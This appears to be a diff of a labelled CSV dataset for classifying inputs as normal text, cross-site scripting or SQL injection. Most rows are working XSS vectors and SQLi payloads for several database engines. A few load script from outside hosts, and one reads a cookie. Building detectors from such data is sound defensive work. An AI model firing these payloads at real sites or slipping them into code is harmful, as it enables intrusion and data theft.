-"{""id"":null,""name"":""Togekiss""}",0,normal,25904 -Select water.,0,normal,24691 -"{""id"":null,""firstName"":""Kinki"",""lastName"":""Lws"",""address"":""78112 Morris Ave"",""city"":""234"",""telephone"":""3488764909""}",0,normal,25691 -"{""id"":null,""firstName"":""Alan"",""lastName"":""Meng"",""specialties"":[{""id"":6155,""name"":""Air Defense Artillery (ADA)""}]}",0,normal,25297 -"<content onmouseleave=""alert(1)"">test</content>",1,XSS,1841 -Select venue.,0,normal,24725 -"<meta http-equiv=""refresh"" content=""0; url=//portswigger-labs.net"">",1,XSS,176 -"1%"" and 9254 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --",2,SQLi,15722 -"-6370' ) ) as sims where 9388 = 9388 union all select 9388,9388,9388,9388,9388,9388,9388,9388#",2,SQLi,13555 -"<ol onmouseleave=""alert(1)"">test</ol>",1,XSS,6271 -"<br onmouseenter=""alert(1)"">test</br>",1,XSS,4236 -"1%' ) and 8635 = ( select count ( * ) from generate_series ( 1,5000000 ) ) --",2,SQLi,21190 -1' ) as gsjr where 7046 = 7046 and sleep ( 5 ) #,2,SQLi,13405 -Select dinner.,0,normal,24684 --9564 or 4144 = ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4144 = 4144 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62 ) ) ) from dual ),2,SQLi,12921 -"1) or benchmark(10000000,MD5(1))#",2,SQLi,10132 -"<meta/content=""0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgxMzM3KTwvc2NyaXB0Pg==""http-equiv=refresh>",1,XSS,9749 -"-9881"" ) ) or 9850 = 8118#",2,SQLi,12487 -)) RLIKE SLEEP(5) AND ((1337=1337,2,SQLi,11285 -"1%' and 8635 = ( select count ( * ) from generate_series ( 1,5000000 ) ) --",2,SQLi,19474 -"<summary onmouseover=""alert(1)"">test</summary>",1,XSS,8120 -1' and 8594 = ( select 8594 from pg_sleep ( 5 ) ) --,2,SQLi,14471 -Fetch information where applicable.,0,normal,23523 -"1%' ) ) or 2367 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --",2,SQLi,14338 -"<picture onmouseup=""alert(1)"">test</picture>",1,XSS,5027 -"1 ) as qodq where 4945 = 4945 or 9643 = ( select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --",2,SQLi,16190 -"{""id"":null,""name"":""meet""}",0,normal,25251 -"<sup onmousedown=""alert(1)"">test</sup>",1,XSS,6150 -"<option onbeforecut=""alert(1)"" contenteditable>test</option>",1,XSS,2745 -<s onpointerout=alert(1)>XSS</s>,1,XSS,4915 -<image onpointerenter=alert(1)>XSS</image>,1,XSS,2280 -"<style>@keyframes slidein {}</style><address style=""animation-duration:1s;animation-name:slidein;animation-iteration-count:2"" onanimationiteration=""alert(1)""></address>",1,XSS,5827 -"1' ) or char ( 117 ) ||char ( 111 ) ||char ( 105 ) ||char ( 100 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) and ( 'ozef' = 'ozef",2,SQLi,13899 -;SELECT pg_sleep(5);,2,SQLi,11398 -"select * from users where id = '1' union select $ _,@@VERSION -- 1'",2,SQLi,11875 -"<param onmousedown=""alert(1)"">test</param>",1,XSS,8795 -hour,0,normal,23386 -"1' ) where 8628 = 8628 union all select null,null,null--",2,SQLi,20748 -<input3 onpointerup=alert(1)>XSS</input3>,1,XSS,2458 -<xmp onpointerup=alert(1)>XSS</xmp>,1,XSS,2450 -<samp onblur=alert(1) tabindex=1 id=x></samp><input autofocus>,1,XSS,8744 -(SELECT pg_sleep(5)),2,SQLi,11402 -"<select onkeyup=""alert(1)"" contenteditable>test</select>",1,XSS,3625 -"1' ) and 6414 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 )",2,SQLi,17062 -"1"" where 5477 = 5477",2,SQLi,19350 -"select * from users where id = 1 or 1#""; or 1 = 1 -- 1",2,SQLi,11743 -"<details/open/ontoggle=""alert`1`"">",1,XSS,9748 -They joined the yoga class.,0,normal,23201 -"<div id=d><x xmlns=""><iframe onload=javascript:alert(1)""></div> <script>d.innerHTML=d.innerHTML</script>",1,XSS,607 -"1"" and exp ( ~ ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 8190 = 8190,1 ) ) ) ,0x717a767a71,0x78 ) ) x ) ) and ""oyuj"" = ""oyuj",2,SQLi,20449 -"( select * from ( select ( sleep ( 5 ) ) ) srmq ) and ( ""%"" = """,2,SQLi,19050 -admin' or '1' = '1'/*,2,SQLi,12134 -"1"" and char ( 111 ) ||char ( 77 ) ||char ( 121 ) ||char ( 88 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) and ""vukd"" = ""vukd",2,SQLi,14571 -"1' or 8384 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) and 'aytf' like 'aytf",2,SQLi,15727 -"<mark draggable=""true"" ondragenter=""alert(1)"">test</mark>",1,XSS,8774 -Retrieve data where necessary.,0,normal,23466 -"1%"" and 8312 = dbms_pipe.receive_message ( chr ( 69 ) ||chr ( 79 ) ||chr ( 101 ) ||chr ( 68 ) ,5 ) --",2,SQLi,17119 -"UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--",2,SQLi,10712 -1 ) ) as myxo where 1759 = 1759 union all select null#,2,SQLi,21713 -"{""id"":null,""firstName"":""Hoe"",""lastName"":""Siew Lan"",""address"":""185 Blackstone Bldge"",""city"":""367"",""telephone"":""246100175""}",0,normal,25431 -"1"" ) ) ) and 3715 in ( ( char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 3715 = 3715 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) and ( ( ( ""dksc"" = ""dksc",2,SQLi,15918 -<picture id=x tabindex=1 onactivate=alert(1)></picture>,1,XSS,2212 -"-3633' ) where 3513 = 3513 union all select 3513,3513,3513,3513,3513,3513,3513,3513,3513,3513#",2,SQLi,15865 -<dd id=x tabindex=1 onactivate=alert(1)></dd>,1,XSS,2808 -"1"" ) ) ) or ( select * from ( select ( sleep ( 5 ) ) ) sddo ) #",2,SQLi,14512 -"<content draggable=""true"" ondragenter=""alert(1)"">test</content>",1,XSS,8558 -1' ) and 6240 = ( 'qqpjq'|| ( select case 6240 when 6240 then 1 else 0 end from rdb$database ) ||'qzvzq' ),2,SQLi,21719 -"select * from users where id = 1 or "" ( 1"" or 1 = 1 -- 1",2,SQLi,12014 -1 RLIKE SLEEP(5)-- 1337,2,SQLi,11288 -"<style>:target {transform: rotate(180deg);}</style><colgroup id=x style=""transition:transform 2s"" ontransitionrun=alert(1)></colgroup>",1,XSS,2747 -"1'|| ( select 'ybfo' from dual where 3319 = 3319 union all select null,null,null,null,null,null,null,null#",2,SQLi,17543 -<form onblur=alert(1) tabindex=1 id=x></form><input autofocus>,1,XSS,2610 -"-8725"" ) ) ) or ( 8459 = 8459 ) *4906 and ( ( ( ""vblw"" like ""vblw",2,SQLi,21879 -"""),NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*",2,SQLi,10926 -"<acronym oncopy=""alert(1)"" contenteditable>test</acronym>",1,XSS,8644 -1'+ ( select mavu where 4276 = 4276 rlike sleep ( 5 ) #,2,SQLi,12839 -"1%' or 6979 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) --",2,SQLi,22314 -<script>var{haha:onerror=alert}=0;throw 1</script>,1,XSS,140 -Select a gift.,0,normal,22981 -"1%' ) and 6537 = dbms_pipe.receive_message ( chr ( 76 ) ||chr ( 116 ) ||chr ( 117 ) ||chr ( 65 ) ,5 ) and ( '%' = '",2,SQLi,15235 -"call regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) #",2,SQLi,14626 -"--></noscript></noembed></template></title></textarea></style><script>alert()</script> -'--></title></textarea></style></noscript></noembed></template></frameset><svg onload=alert()>",1,XSS,9515 -<svg><center onload=alert(1)></center>,1,XSS,8279 -&#x000003c,1,XSS,1030 -1 ) where 6304 = 6304,2,SQLi,21307 -<x onmouseout=alert(1)>hover this!,1,XSS,9339 -"-9145' ) as xyya where 8950 = 8950 union all select 8950,8950,8950,8950,8950,8950,8950,8950--",2,SQLi,15097 -"<span draggable=""true"" ondragenter=""alert(1)"">test</span>",1,XSS,2464 -Select your consequence.,0,normal,25061 -Order a large latte.,0,normal,22814 -"{""id"":null,""name"":""tail""}",0,normal,25600 -Filter the spam calls on your phone.,0,normal,23130 -<mark onpointerenter=alert(1)>XSS</mark>,1,XSS,6594 -"-6945' union all select 5063,5063,5063,5063,5063,5063,5063,5063--",2,SQLi,17215 -"<bdi onmousedown=""alert(1)"">test</bdi>",1,XSS,1922 -1'+ ( select 'mzee' where 5984 = 5984,2,SQLi,20941 -1' ) ) and 9198 = 9198--,2,SQLi,20997 -"1"" where 3484 = 3484 and char ( 107 ) ||char ( 121 ) ||char ( 97 ) ||char ( 80 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --",2,SQLi,15136 -"1%' ) ) ) or char ( 119 ) ||char ( 100 ) ||char ( 99 ) ||char ( 121 ) = regexp_substring ( repeat ( right ( char ( 1441 ) ,0 ) ,5000000000 ) ,null ) --",2,SQLi,14627 -1 where 6523 = 6523 and 8594 = ( select 8594 from pg_sleep ( 5 ) ) --,2,SQLi,16355 -1' in boolean mode ) and sleep ( 5 ) #,2,SQLi,14690 -1'|| ( select 'feki' where 4082 = 4082 and ( 3587 = 4207 ) *4207 ) ||',2,SQLi,13927 -"<dir onbeforecut=""alert(1)"" contenteditable>test</dir>",1,XSS,7364 -Where's your SQL project?,0,normal,23605 -"1"" ) ) as zgig where 5748 = 5748 and 6055 = ctxsys.drithsx.sn ( 6055, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 6055 = 6055 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) --",2,SQLi,18108 -Where did you find that adorable puppy?,0,normal,23903 -"<div id=""88""><svg xmlns=""http://www.w3.org/2000/svg"" xmlns:xlink=""http://www.w3.org/1999/xlink"">",1,XSS,9135 -"<a target=""x"" href=""xssme?xss=<script>find('cookie'); var doc = getSelection().getRangeAt(0).startContainer.ownerDocument; console.log(doc); var xpe = new XPathEvaluator(); var nsResolver = xpe.createNSResolver(doc); var result = xpe.evaluate('//script/text()', doc, nsResolver, 0, null); alert(result.iterateNext().data.match(/cookie = '(.*?)'/)[1])</script>",1,XSS,9049 -Update the software version.,0,normal,22829 -"<pre ondblclick=""alert(1)"">test</pre>",1,XSS,7649 -"<form onbeforecut=""alert(1)"" contenteditable>test</form>",1,XSS,6349 -Delete posts.,0,normal,23230 -"<div onbeforecut=""alert(1)"" contenteditable>test</div>",1,XSS,6449 -<footer onpointerenter=alert(1)>XSS</footer>,1,XSS,6163 -Determine values where applicable.,0,normal,23471 -1'+ ( select qugu where 2287 = 2287 order by 1#,2,SQLi,16104 -waitfor delay '0:0:5'# ogzq,2,SQLi,17142 -"<xmp onmouseleave=""alert(1)"">test</xmp>",1,XSS,2905 -"select * from generate_series ( 9434,9434,case when ( 9434 = 3991 ) then 1 else 0 end ) limit 1--",2,SQLi,14532 -"1%"" ) and 7533 = 7533 and ( ""%"" = """,2,SQLi,14765 +"-9558"" ) ) ) union all select 2935,2935,2935,2935,2935--",2,SQLi,16084 +"<style>:target {transform: rotate(180deg);}</style><dl id=x style=""transition:transform 2s"" ontransitionrun=alert(1)></dl>",1,XSS,5454 +"AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)))#",2,SQLi,10607 +"<style>:target {color: red;}</style><source id=x style=""transition:color 10s"" ontransitioncancel=alert(1)></source>",1,XSS,8732 +select pg_sleep ( 5 ) and ( ( ( '%' = ',2,SQLi,13045 +waitfor delay '00:00:05'#,2,SQLi,10273 +"1' ) ) as ydbt where 8062 = 8062 and 6414 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --",2,SQLi,15001 +"iif ( 3447 = 1084,1,1/0 )",2,SQLi,14534 +1 where 2384 = 2384 and ( select * from ( select ( sleep ( 5 ) ) ) gcrr ) #,2,SQLi,15474 +Select the perfect attire for an event.,0,normal,24012 +"<fieldset oncut=""alert(1)"" contenteditable>test</fieldset>",1,XSS,2255 +Start the Music app and select a song to play.,0,normal,25488 +"1', ( select ( case when ( 9443 = 9443 ) then sleep ( 5 ) else 9443* ( select 9443 from information_schema.character_sets ) end ) )",2,SQLi,12031 +"1"" where 3368 = 3368 and 9254 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --",2,SQLi,19214 +"1"" ) ) as cduw where 4495 = 4495",2,SQLi,15599 +"1%"" or 9643 = ( select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) and ""%"" = """,2,SQLi,12372 +<img onpointerover=alert(1)>XSS</img>,1,XSS,5283 +"<a style=""-o-link:'javascript:javascript:alert(1)';-o-link-source:current"">X",1,XSS,650 +"1' ) or updatexml ( 1808,concat ( 0x2e,0x7171706a71, ( select ( elt ( 1808 = 1808,1 ) ) ) ,0x717a767a71 ) ,8666 ) and ( 'iifh' = 'iifh",2,SQLi,20028 +select ( case when ( 7096 = 2568 ) then 7096 else 1/ ( select 0 ) end ) --,2,SQLi,14273 +"-2838"" where 5442 = 5442 union all select 5442#",2,SQLi,21815 +"1"" where 1920 = 1920 and 8635 = ( select count ( * ) from generate_series ( 1,5000000 ) ) --",2,SQLi,16277 +"<SCRIPT ="">"" SRC=""httx://xss.rocks/xss.js""></SCRIPT",1,XSS,291 +"<link draggable=""true"" ondragleave=""alert(1)"">test</link>",1,XSS,7548 +"""For Sama"" is released in select cinemas on September 13th.",0,normal,26417 +Modify the account settings.,0,normal,22650 +Update the post.,0,normal,22835 +"select * from users where id = 11||1 union select 1,banner from v$version where rownum = 1 -- 1",2,SQLi,11713 +<a id=x tabindex=1 ondeactivate=alert(1)></a><input id=y autofocus>,1,XSS,1992 +-4713' ) ) ) or 4567 = 1287,2,SQLi,17428 +select ( case when ( 6843 = 2657 ) then 6843 else 6843* ( select 6843 from information_schema.character_sets ) end ) #,2,SQLi,21508 +"<style>@keyframes x{}</style><noscript style=""animation-name:x"" onanimationend=""alert(1)""></noscript>",1,XSS,4247 +"<style>:target {color: red;}</style><spacer id=x style=""transition:color 10s"" ontransitioncancel=alert(1)></spacer>",1,XSS,3427 +"-9496 ) ) ) or elt ( 7511 = 3951,3951 ) and ( ( ( 3514 = 3514",2,SQLi,16761 +"<main onmouseover=""alert(1)"">test</main>",1,XSS,6546 +"AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=6)) AND 'i'='i",2,SQLi,11012 +"union select * from users where login = char(114,111,111,116);",2,SQLi,11038 +"1"" ) as wjdc where 8694 = 8694 and 2853 = cast ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) ) || ( select ( case when ( 2853 = 2853 ) then 1 else 0 end ) ) ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) as numeric ) --",2,SQLi,21767 +"AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)))--",2,SQLi,10578 +"select * from users where id = '1' union select ( 1 ) ,banner from v$version where rownum = 1 -- 1'",2,SQLi,11941 +-4758%' ) ) or 5903 = ( 'qqpjq'|| ( select case 5903 when 5903 then 1 else 0 end from rdb$database ) ||'qzvzq' ) and ( ( '%' = ',2,SQLi,20409 +<script onpointerout=alert(1)>XSS</script>,1,XSS,7308 +"<style>:target {color: red;}</style><sup id=x style=""transition:color 10s"" ontransitioncancel=alert(1)></sup>",1,XSS,8361 +"select * from generate_series ( 9434,9434,case when ( 9434 = 3991 ) then 1 else 0 end ) limit 1--",2,SQLi,14361 "<svg onUnload svg onUnload=""javascript:javascript:alert(1)""></svg onUnload>",1,XSS,383 -"<svg><use href=""//subdomain1.portswigger-labs.net/use_element/upload.php#x"" /></svg>",1,XSS,226 -"<style>:target {color: red;}</style><colgroup id=x style=""transition:color 10s"" ontransitioncancel=alert(1)></colgroup>",1,XSS,5967 -1' and 4595 = 4595#,2,SQLi,19783 -Where's the best place to capture natural beauty?,0,normal,24004 -"select * from users where id = '1' or ||/1 = 1 union select 1,version ( ) -- 1'",2,SQLi,11452 -"<head draggable=""true"" ondragstart=""alert(1)"">test</head>",1,XSS,2617 -Select the music.,0,normal,24997 -"1' ) ) as omwk where 1414 = 1414 and char ( 120 ) ||char ( 106 ) ||char ( 117 ) ||char ( 85 ) = regexp_substring ( repeat ( right ( char ( 9981 ) ,0 ) ,5000000000 ) ,null ) --",2,SQLi,14106 -"<u onbeforepaste=""alert(1)"" contenteditable>test</u>",1,XSS,4372 -"select * from users where id = 1 or ""$ ( "" or 1 = 1 -- 1",2,SQLi,11842 -AND 1=utl_inaddr.get_host_address((SELECT banner FROM v$version WHERE ROWNUM=1)) AND 'i'='i,2,SQLi,11120 -Delete duplicate photos from your album.,0,normal,23132 -"1"" where 8387 = 8387",2,SQLi,20159 -"1' or 7552 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 )",2,SQLi,14228 -onSelectStart,1,XSS,9713 -"1 ) or 8384 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) and ( 9112 = 9112",2,SQLi,14327 -"{""id"":null,""firstName"":""Ann"",""lastName"":""Ang"",""specialties"":[{""id"":6155,""name"":""Air Defense Artillery (ADA)""}]}",0,normal,25278 -"<style>:target {color: red;}</style><dir id=x style=""transition:color 10s"" ontransitioncancel=alert(1)></dir>",1,XSS,2082 -"-1064' or make_set ( 6439 = 2937,2937 ) and 'qojd' = 'qojd",2,SQLi,12230 --3458' ) where 2053 = 2053 or 4747 = dbms_utility.sqlid_to_sqlhash ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4747 = 4747 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) --,2,SQLi,20550 -Can you help me decide where to study?,0,normal,23902 -"-2006' ) ) union all select 7852,7852,7852,7852,7852--",2,SQLi,19122 -<svg onpointerup=alert(1)>XSS</svg>,1,XSS,8376 -"1' ) procedure analyse ( extractvalue ( 5840,concat ( 0x5c,0x7171706a71, ( select ( case when ( 5840 = 5840 ) then 1 else 0 end ) ) ,0x717a767a71 ) ) ,1 )",2,SQLi,12764 -Select the appropriate app for the task.,0,normal,24439 -"<p draggable=""true"" ondragenter=""alert(1)"">test</p>",1,XSS,6124 -I want to select the perfect spot for the picnic.,0,normal,23853 -"<article onkeydown=""alert(1)"" contenteditable>test</article>",1,XSS,2324 -"<style>:target {color: red;}</style><multicol id=x style=""transition:color 10s"" ontransitioncancel=alert(1)></multicol>",1,XSS,4557 -"<SCRIPT SRC=""http://.rocks/.jpg""></SCRIPT>",1,XSS,5943 -"<shadow onkeypress=""alert(1)"" contenteditable>test</shadow>",1,XSS,4198 -"{""id"":null,""name"":""Seismitoad""}",0,normal,25841 -"<style>@keyframes x{}</style><col style=""animation-name:x"" onanimationend=""alert(1)""></col>",1,XSS,2753 -"-2424 ) where 8132 = 8132 or 5023 = ctxsys.drithsx.sn ( 5023, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 5023 = 5023 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) --",2,SQLi,14167 -"ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24#",2,SQLi,10500 -<data id=x tabindex=1 onbeforedeactivate=alert(1)></data><input autofocus>,1,XSS,5812 -Select soda.,0,normal,24692 -<strike onblur=alert(1) tabindex=1 id=x></strike><input autofocus>,1,XSS,2502 -1 rlike ( select * from ( select ( sleep ( 5 ) ) ) sgvo ) # ewsz,2,SQLi,16184 -Merge data.,0,normal,23211 -"<strike onkeyup=""alert(1)"" contenteditable>test</strike>",1,XSS,2749 -<dt id=x tabindex=1 ondeactivate=alert(1)></dt><input id=y autofocus>,1,XSS,3653 -"<menu onmouseup=""alert(1)"">test</menu>",1,XSS,2208 -1 ) ) as vmwj where 5597 = 5597,2,SQLi,21064 -"<style>:target {color: red;}</style><mark id=x style=""transition:color 10s"" ontransitioncancel=alert(1)></mark>",1,XSS,8138 -Where to optimize queries?,0,normal,23566 -"{""id"":null,""firstName"":""Annabelle"",""lastName"":""Lee"",""address"":""2 College Ave West, Stephen Riady Centre, Singapore 138607"",""city"":""378"",""telephone"":""2685918959""}",0,normal,25916 -"<style>@keyframes x{}</style><template style=""animation-name:x"" onanimationstart=""alert(1)""></template>",1,XSS,5677 -onBeforeUpdate,1,XSS,9634 -1 rlike sleep ( 5 ),2,SQLi,22604 -"<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><rp id=x style=""position:absolute;"" onanimationcancel=""alert(1)""></rp>",1,XSS,4157 -"select * from users where id = '1' union select 1a,banner from v$version where rownum = 1 -- 1'",2,SQLi,11856 -"-6754' ) where 8388 = 8388 union all select 8388,8388,8388,8388,8388--",2,SQLi,13303 -"1"" where 9241 = 9241 union all select null#",2,SQLi,21740 -"<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><img id=x style=""position:absolute;"" onanimationcancel=""alert(1)""></img>",1,XSS,6706 -"&lt;IMG SRC=\""javascript&#058;alert('XSS')\""",1,XSS,1040 -"-1889%' ) ) ) or 5023 = ctxsys.drithsx.sn ( 5023, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 5023 = 5023 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) and ( ( ( '%' = '",2,SQLi,17338 -"<menuitem onpaste=""alert(1)"" contenteditable>test</menuitem>",1,XSS,7101 -"{""id"":null,""name"":""name spell""}",0,normal,25966 -"1' in boolean mode ) and row ( 6237,7469 ) > ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 6237 = 6237,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from ( select 5192 union select 3785 union select 3931 union select 7158 ) a group by x ) #",2,SQLi,13397 -"<style>@keyframes x{}</style><em style=""animation-name:x"" onanimationend=""alert(1)""></em>",1,XSS,3442 -"1%"" ) and ( select * from ( select ( sleep ( 5 ) ) ) gcrr ) #",2,SQLi,15986 -rollback,0,normal,23349 -"1"" and ( 3020 = 3020 ) *6703",2,SQLi,14011 -"-9133"" ) ) or 4747 = dbms_utility.sqlid_to_sqlhash ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4747 = 4747 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) and ( ( ""crfy"" = ""crfy",2,SQLi,22606 -AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(table_name)) FROM sys.all_tables)) AND 'i'='i,2,SQLi,11127 -"<content onmousemove=""alert(1)"">test</content>",1,XSS,2112 -"1 ) ) as cvid where 4381 = 4381 union all select null,null--",2,SQLi,20859 -Select a fragrance for relaxation.,0,normal,24181 -"1' ) or row ( 1045,7562 ) > ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 1045 = 1045,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from ( select 8488 union select 5584 union select 3051 union select 1210 ) a group by x )",2,SQLi,16292 -<main onpointerover=alert(1)>XSS</main>,1,XSS,3785 -"1' and 3580 = ( select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --",2,SQLi,18757 -"{""id"":null,""name"":""health""}",0,normal,25585 -<svg><noscript onload=alert(1)></noscript>,1,XSS,5672 -"1' ) union all select null,null,null,null--",2,SQLi,14406 -Where's your SQL knowledge?,0,normal,23560 -"1%' ) ) ) union all select null,null,null,null,null,null#",2,SQLi,15002 --8341 or 8571 = 8571--,2,SQLi,13557 -"-3102 ) union all select 6707,6707,6707,6707--",2,SQLi,18602 -<select onblur=alert(1) id=x></select><input autofocus>,1,XSS,3351 -1' ) as jdmh where 6175 = 6175 rlike sleep ( 5 ) #,2,SQLi,12956 -"1' where 1085 = 1085 or 8315 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --",2,SQLi,19065 -ORDER BY 13#,2,SQLi,10321 -<applet onpointerover=alert(1)>XSS</applet>,1,XSS,3062 -"1%' ) ) and char ( 120 ) ||char ( 106 ) ||char ( 117 ) ||char ( 85 ) = regexp_substring ( repeat ( right ( char ( 9981 ) ,0 ) ,5000000000 ) ,null ) and ( ( '%' = '",2,SQLi,17679 -"1"" or exp ( ~ ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 6270 = 6270,1 ) ) ) ,0x717a767a71,0x78 ) ) x ) )",2,SQLi,22412 -"and 1=( if((load_file(char(110,46,101,120,11 ...",2,SQLi,10140 -javascript\x0A:javascript:alert(1),1,XSS,9501 -"1"" and 2853 = cast ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) ) || ( select ( case when ( 2853 = 2853 ) then 1 else 0 end ) ) ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) as numeric )",2,SQLi,12568 -<progress onpointerleave=alert(1)>XSS</progress>,1,XSS,3121 -"1%"" and make_set ( 2905 = 5725,5725 ) and ""%"" = """,2,SQLi,22033 -globalThis[`al`+/ert/.source]`1`,1,XSS,9411 -"1%"" or 8384 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) and ""%"" = """,2,SQLi,18270 -"<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><plaintext id=x style=""position:absolute;"" onanimationcancel=""alert(1)""></plaintext>",1,XSS,2421 -1 ) where 4992 = 4992,2,SQLi,20246 -"1' ) ) ) and updatexml ( 3393,concat ( 0x2e,0x7171706a71, ( select ( elt ( 3393 = 3393,1 ) ) ) ,0x717a767a71 ) ,1161 ) and ( ( ( 'gwew' like 'gwew",2,SQLi,14314 -<cite onpointerout=alert(1)>XSS</cite>,1,XSS,5251 -"iif ( 5214 = 7412,1,1/0 )",2,SQLi,15610 -"-2168 ) union all select 4980,4980,4980,4980,4980,4980,4980,4980,4980--",2,SQLi,19052 -"<!--<img src=""--><img src=x onerror=alert(XSS)//"">",1,XSS,914 -"-1653 union all select 8415,8415,8415,8415,8415,8415,8415,8415#",2,SQLi,19085 -<dd onfocusout=alert(1) tabindex=1 id=x></dd><input autofocus>,1,XSS,8452 - googlecom,0,normal,25849 -"<embed onbeforecopy=""alert(1)"" contenteditable>test</embed>",1,XSS,6904 -"<var onmouseup=""alert(1)"">test</var>",1,XSS,5916 -%' AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND '1337%'='1337,2,SQLi,11267 -1' where 8537 = 8537 and 3754 = ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 3754 = 3754 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62 ) ) ) from dual ) --,2,SQLi,19281 -"<style>@keyframes x{}</style><rb style=""animation-name:x"" 